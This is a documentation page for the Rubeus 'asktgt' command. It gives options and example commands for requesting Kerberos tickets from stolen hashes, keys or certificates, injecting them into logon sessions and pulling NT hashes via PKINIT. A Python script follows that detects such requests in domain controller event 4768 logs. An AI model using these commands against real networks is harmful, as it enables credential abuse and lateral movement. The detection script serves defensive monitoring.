asktgt

Request a Ticket-Granting-Ticket (TGT) from a hash, key, password, or certificate. Sends raw AS-REQ traffic directly to the KDC; no LSASS interaction is required.

Usage

Rubeus.exe asktgt /user:<username> </password:<password> [/enctype:DES|RC4|AES128|AES256] | /des:<hash> | /rc4:<rc4> | /aes128:<aes128-key> | /aes256:<aes256-key>> [/domain:<domain>] [/dc:<dc-ip>] [/outfile:<output>] [/ptt] [/luid] [/nowrap] [/opsec] [/nopac] [/proxyurl:https://KDC_PROXY/kdcproxy] [/suppenctype:DES|RC4|AES128|AES256]

Options

  • /user:<username> - target username
  • /password:<password> - plaintext password (defaults to RC4 enctype)
  • /rc4:<rc4> - RC4/NTLM hash
  • /aes256:<aes256-key> - AES256 key
  • /aes128:<aes128-key> - AES128 key
  • /des:<hash> - DES key
  • /domain:<domain> - FQDN of target domain (defaults to current)
  • /dc:<dc-ip> - domain controller FQDN or IP (defaults to current)
  • /enctype:DES|RC4|AES128|AES256 - force specific encryption type
  • /ptt - pass-the-ticket, apply to current logon session
  • /luid - apply to specific logon session (elevated)
  • /outfile:<output> - save ticket to file
  • /nowrap - don't line-wrap base64 output
  • /opsec - send initial AS-REQ without preauth (stealthier)
  • /nopac - request TGT without PAC
  • /createnetonly:C:\Windows\System32\cmd.exe - create sacrificial process, apply ticket there
  • /show - show the created process window
  • /certificate:<path.pfx> - use PKINIT certificate authentication
  • /getcredentials - retrieve NT hash via U2U after PKINIT
  • /changepw - request TGT suitable for Kerberos password change
  • /service:<spn> - request service ticket via AS-REQ directly
  • /proxyurl:<url> - use KDC proxy (MS-KKDCP)
  • /suppenctype:DES|RC4|AES128|AES256 - suppress encryption type

Examples

# RC4 hash, apply to current session
Rubeus.exe asktgt /user:<username> /rc4:<rc4> /domain:<domain> /ptt

# AES256, create sacrificial process (elevated)
Rubeus.exe asktgt /user:<username> /domain:<domain> /aes256:<aes256-key> /createnetonly:C:\Windows\System32\cmd.exe /show

# Password-based
Rubeus.exe asktgt /user:<username> /password:<password> /domain:<domain> /dc:<dc-ip> /ptt

# PKINIT certificate + retrieve NT hash
Rubeus.exe asktgt /user:<username> /domain:<domain> /dc:<dc-ip> /getcredentials /certificate:<path.pfx> /password:<password>

# No PAC
Rubeus.exe asktgt /user:<username> /domain:<domain> /nopac

# For password change (expired password)
Rubeus.exe asktgt /user:<username> /password:<password> /changepw /domain:<domain>

# Save to file
Rubeus.exe asktgt /user:<username> /aes256:<aes256-key> /domain:<domain> /outfile:<output>

Notes

  • No elevated privileges required to request TGTs for the current logon session
  • /luid and /createnetonly require elevation
  • Only one TGT can be applied per logon session at a time with /ptt - use /createnetonly to avoid clobbering existing tickets
  • /opsec forces AES256 by default; use /force to override with other enc types
  • Decode saved base64 blob: [IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<base64>"))
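Because asktgt talks to the KDC directly, the domain controller's Security log (event 4768, "A Kerberos authentication ticket (TGT) was requested") is where the request surfaces: a /password request defaults to RC4 (TicketEncryptionType 0x17) where AES is the norm, and a successful request with PreAuthType 0 means the account had pre-authentication disabled. The triage script below is an added example, not Rubeus code; the 4768 events it parses are constructed inline in a flattened key=value rendering of the event's XML fields, and the list of acceptable encryption types is an assumption to tune per environment.

```python
import re

# Windows 4768 TicketEncryptionType values -> label
ETYPE = {"0x1": "DES-CBC-CRC", "0x3": "DES-CBC-MD5", "0x11": "AES128",
         "0x12": "AES256", "0x17": "RC4-HMAC"}
# Windows 4768 PreAuthType values -> label
PREAUTH = {"0": "none", "2": "PA-ENC-TIMESTAMP (password/key)", "16": "PA-PK-AS-REQ (PKINIT)"}

# Constructed sample events (not real log data); field names follow the 4768 EventData
SAMPLE_4768 = [
    "TargetUserName=jdoe IpAddress=::ffff:10.0.0.25 Status=0x0 TicketEncryptionType=0x12 PreAuthType=2",
    "TargetUserName=svc-backup IpAddress=::ffff:10.0.0.77 Status=0x0 TicketEncryptionType=0x17 PreAuthType=2",
    "TargetUserName=legacy01 IpAddress=::ffff:10.0.0.90 Status=0x0 TicketEncryptionType=0x17 PreAuthType=0",
    "TargetUserName=jdoe IpAddress=::ffff:10.0.0.25 Status=0x19 TicketEncryptionType=0xffffffff PreAuthType=-",
]


def parse_4768(line):
    """Turn a flattened 'key=value ...' 4768 event into a dict."""
    return dict(re.findall(r"(\w+)=(\S+)", line))


def assess(ev, allowed_etypes=("0x11", "0x12")):
    """Return the findings for one 4768 event; only successful requests are assessed.

    allowed_etypes is an assumption: an AES-only environment is modelled here."""
    findings = []
    if ev.get("Status", "0x0").lower() != "0x0":
        return findings  # failed requests (e.g. 0x19 preauth-required) need other logic
    etype = ev["TicketEncryptionType"].lower()
    if etype not in allowed_etypes:
        findings.append(f"unexpected etype {ETYPE.get(etype, etype)}")
    pa = ev.get("PreAuthType", "")
    if pa == "0":
        findings.append("TGT issued without pre-authentication")
    elif pa == "16":
        findings.append("certificate (PKINIT) authentication")
    return findings


def scan(lines):
    """Return (user, source IP, finding) triples for every flagged event."""
    out = []
    for line in lines:
        ev = parse_4768(line)
        for f in assess(ev):
            out.append((ev["TargetUserName"], ev["IpAddress"], f))
    return out


if __name__ == "__main__":
    for user, ip, finding in scan(SAMPLE_4768):
        print(f"{user:12} {ip:22} {finding}")
```

Correlate the flagged source IP with the host that owns the user's normal sessions; a TGT request for an account from a workstation that never authenticates as that account is the signal worth chasing.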